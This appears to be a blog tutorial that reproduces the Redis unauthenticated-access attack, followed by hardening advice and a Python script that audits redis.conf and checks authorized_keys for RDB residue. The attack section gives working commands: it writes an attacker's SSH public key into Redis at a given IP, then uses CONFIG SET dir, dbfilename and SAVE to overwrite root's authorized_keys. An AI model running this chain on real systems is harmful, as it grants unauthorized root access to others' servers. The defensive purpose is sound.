Foreword
I have installed redis on cloud servers twice, and each time I received a notice that it was being used to attack others. (I'm a good person, how could I possibly do anything bad?) So my server must have been compromised. It is a personal server with nothing important on it, the port is open all year round, no firewall whitelist is enabled, and most importantly, no password is set. No wonder it was broken into every day. Let's reproduce the attack below.
Principle
There are several ways to log in to Linux; the most common are password login and RSA key login. For RSA key login you generate a public/private key pair and place the public key in the server's /root/.ssh/authorized_keys file; the local client can then log in by importing the corresponding private key. That is the RSA key login method.
But why can the server's root privileges be obtained through redis?
The RSA key login method above writes the public key into the authorized_keys file on the server side. Redis has a persistence mechanism that writes an RDB file, and through that persistence the public key can be written into root's authorized_keys file. An illegitimate public key thus ends up in the verification file, and we can later log in with the corresponding private key. (But this method only works when redis was started as root, because a non-root user cannot enter the /root directory.)
Generate RSA key
To generate an RSA key pair whose public and private keys are known to us, execute the following command on a server you can log in to:
ssh-keygen -t rsa
After execution the following two files are generated:
id_rsa is the private key, used by the client to log in;
id_rsa.pub is the public key, which is placed on the server.
You can first verify that these two keys allow you to log in to the server. Move the id_rsa.pub file to the /root/.ssh folder:
cp id_rsa.pub /root/.ssh/
Then execute the following command to append the public key to the authorized_keys file:
cat id_rsa.pub >> authorized_keys
Here public-key authentication is used for login. After the login succeeds, keep these two files; they will be used later.
Install redis
On the simulated compromised server, install redis as the root user and enable remote access. If you need a tutorial on installing redis, you can read this article: Install redis online on Linux
Get root permission through redis
Without knowing the Linux account password we cannot log in to Linux, but we can try to get in through the redis installation. First open a redis command line.
As mentioned in the principle above, one of redis's persistence methods writes an RDB file that contains the raw stored data. We put our public key into the redis server, so that we can later log in to the root account with the private key.
Add newlines
Add blank lines before and after the id_rsa.pub content; otherwise the persisted file will contain other content that is not separated from the public key, and the key will fail to match. Execute the following command:
(echo -e '\n\n'; cat id_rsa.pub; echo -e '\n\n') > mykey.pub
The resulting mykey.pub file is what will be persisted into the RDB file.
Write to redis
Write the mykey.pub file generated above into redis by executing the following command:
cat mykey.pub | ./redis-cli -h 111.229.209.244 -p 6379 -x set crackit
Check in redis that the value exists.
Persistence
Here is the most important step: persist the content we wrote into the /root/.ssh/authorized_keys file. This step requires redis to have been started as root, otherwise the file cannot be written.
Select the persistence directory, set the file name, and save:
// select the persistence directory
config set dir /root/.ssh
// set the file name of the persistence file
config set dbfilename authorized_keys
// save
save
Verify
Connect using public-key authentication and import our private key file. As shown below, the login succeeds.
Look at the authorized_keys file: the middle part is the public key we passed in. If you do not add the blank lines and the key gets mixed together with the other content, the key may not match. Now that we have obtained root permission, you can do whatever you want. Let's talk about how to protect against this problem.
Protection
This intrusion method depends on several conditions:
- network connectivity or public-network access
- the default port
- no firewall or whitelist
- no password, or a weak password
- redis started as the root user
The above problems are the main reasons the root account can be obtained. As long as one or two of these conditions are not met, the chance of being broken into is greatly reduced. Therefore, based on the factors above, several protective measures can be taken:
- close public network access
- set up a firewall
- change the default port
- set a complex password
- start redis as a non-root user
- use a new version of redis
Blocking public network access prevents most malicious attacks. Setting up a firewall and whitelist prevents 99% of malicious attacks from external networks. Changing the default port to a custom port makes it harder for people to find the redis service. Setting a password is also essential.
Starting redis as a non-root user prevents this intrusion method 100%, because it needs to modify the public key file in root's directory.
Newer versions of redis do not allow operations without a password by default, so the problem can be avoided.
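As an added example (not part of the original post), the following Python script checks a redis.conf against the checklist above and inspects an authorized_keys file for the RDB residue seen in the verification step; the config texts and key file bytes are constructed samples, and the key in TAMPERED_KEYS is a placeholder.

```python
import re
# Constructed samples (not from the original post). WEAK_CONF matches the setup
# the post describes: exposed, default port, no password, persisting into /root.
WEAK_CONF = "bind 0.0.0.0\nport 6379\nprotected-mode no\ndir /root/.ssh\n"
HARDENED_CONF = ("bind 127.0.0.1\nport 16379\nprotected-mode yes\n"
                 "requirepass CHANGE-ME-long-random-passphrase\n"
                 "dir /var/lib/redis\nrename-command CONFIG \"\"\n")
# A shortened, constructed authorized_keys after the RDB overwrite: RDB header,
# the injected key padded with newlines, then binary trailer bytes.
TAMPERED_KEYS = (b"REDIS0009\xfa\x09redis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x07crackit"
                 b"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7example attacker@host\n\n\n"
                 b"\xff\x8c\x1a\x00\x00\x00\x00\x00\x00\x00")
CLEAN_KEYS = b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExample admin@laptop\n"
KEY_LINE = re.compile(rb"^(ssh-(?:rsa|ed25519)|ecdsa-sha2-\S+) (\S+)(?: (.*))?$")

def parse_conf(text):
    """Map each redis.conf directive to its values (a directive may repeat)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if line:
            key, _, value = line.partition(" ")
            conf.setdefault(key.lower(), []).append(value.strip())
    return conf

def audit_conf(text):
    """Return the items from the post's checklist that this config fails."""
    c = parse_conf(text)
    last = lambda key, default: c.get(key, [default])[-1]
    findings = []
    if last("bind", "0.0.0.0") in ("0.0.0.0", "*", "::"):  # no bind = all interfaces
        findings.append("reachable on all interfaces")
    if last("port", "6379") == "6379":
        findings.append("default port")
    if last("protected-mode", "yes") != "yes":
        findings.append("protected-mode off")
    if not last("requirepass", ""):
        findings.append("no password")
    if last("dir", "").startswith("/root"):
        findings.append("persistence dir under /root")
    if not any(v.upper().startswith("CONFIG ") for v in c.get("rename-command", [])):
        findings.append("CONFIG command still exposed")
    return findings

def inspect_authorized_keys(data):
    """Flag RDB residue (REDIS magic or NUL bytes, never in a key file) and list the keys present."""
    tampered = data.startswith(b"REDIS") or b"\x00" in data
    keys = [m.group(2).decode() for m in map(KEY_LINE.match, data.splitlines()) if m]
    return tampered, keys
```

Running the file check on a real host means reading /root/.ssh/authorized_keys as bytes; sshd skips the unparsable RDB lines, which is exactly why the injected key still works and why the binary residue is the signal to look for.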